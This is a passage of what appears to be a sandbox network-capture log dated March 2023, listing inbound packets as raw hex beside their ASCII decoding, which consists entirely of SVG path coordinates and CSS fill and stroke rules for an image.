6c 6c 3a Data Ascii: 168{fill:#f5da28;}.cls-160{stroke-width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:
2023-03-22 04:45:55 UTC	2075	IN	Data Raw: 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 Data Ascii: 25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1
2023-03-22 04:45:56 UTC	2219	IN	Data Raw: 38 39 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 35 39 2c 32 37 30 2e 33 34 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c Data Ascii: 89,0,2.1,2.1,0,0,1,.16,2.85"/><path class="cls-4" d="M723.59,270.34a1.73,1.73,0,0,1-.78,2.24,2.53,2.53,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,
2023-03-22 04:45:56 UTC	2235	IN	Data Raw: 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 34 2e 31 31 2c 33 33 38 2e 37 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 37 35 30 2c 33 34 30 61 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 Data Ascii: 27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M754.11,338.72a1.72,1.72,0,0,1-.78,2.24A2.51,2.51,0,0,1,750,340a2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0
2023-03-22 04:45:56 UTC	2251	IN	Data Raw: 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 31 2c 32 31 33 2e 32 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 Data Ascii: .51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M771,213.21a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27
2023-03-22 04:45:56 UTC	2267	IN	Data Raw: 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 35 35 2c 32 38 31 2e 35 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 Data Ascii: 2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M801.55,281.59a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4
2023-03-22 04:45:56 UTC	2332	IN	Data Raw: 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 32 2e 30 37 2c 33 35 30 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 Data Ascii: .52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M832.07,350a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path
2023-03-22 04:45:56 UTC	2348	IN	Data Raw: 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 39 2c 32 32 34 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 Data Ascii: 1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><path class="cls-4" d="M849,224.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12
2023-03-22 04:45:56 UTC	2364	IN	Data Raw: 22 20 64 3d 22 4d 38 37 39 2e 37 34 2c 32 39 39 2e 37 37 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 37 39 2c 33 30 32 61 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c Data Ascii: " d="M879.74,299.77A1.72,1.72,0,0,1,879,302a2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,
2023-03-22 04:45:56 UTC	2380	IN	Data Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 36 35 2c 31 37 34 2e 32 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e Data Ascii: "/><path class="cls-4" d="M896.65,174.25a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.
2023-03-22 04:45:56 UTC	2396	IN	Data Raw: 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 37 2e 31 37 2c 32 34 32 2e 36 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 Data Ascii: .12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M927.17,242.63a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2
2023-03-22 04:45:56 UTC	2412	IN	Data Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 36 2e 38 38 2c 31 36 33 2e 37 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 Data Ascii: ><path class="cls-4" d="M1026.88,163.74a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38
2023-03-22 04:45:56 UTC	2428	IN	Data Raw: 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 34 36 2c 32 39 34 2e 31 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c Data Ascii: 6-2.82"/><path class="cls-4" d="M1010.46,294.18a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,
2023-03-22 04:45:56 UTC	2510	IN	Data Raw: 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 30 2e 38 36 2c 32 34 30 2e 34 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 Data Ascii: 6,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M980.86,240.49a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09
2023-03-22 04:45:56 UTC	2526	IN	Data Raw: 2c 31 38 30 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 32 36 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 Data Ascii: ,180a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M951.26,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85
2023-03-22 04:45:56 UTC	2542	IN	Data Raw: 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 34 33 2c 31 32 36 2e 32 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c Data Ascii: 1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M921.43,126.29a1.7,1.7,0,0,1,.77-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,
2023-03-22 04:45:56 UTC	2558	IN	Data Raw: 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 32 34 2c 32 36 33 2e 35 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 Data Ascii: 2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.24,263.56a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><pa
2023-03-22 04:45:56 UTC	2574	IN	Data Raw: 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 34 31 2c 32 30 33 2e 30 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c Data Ascii: ass="cls-4" d="M875.41,203.05a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,
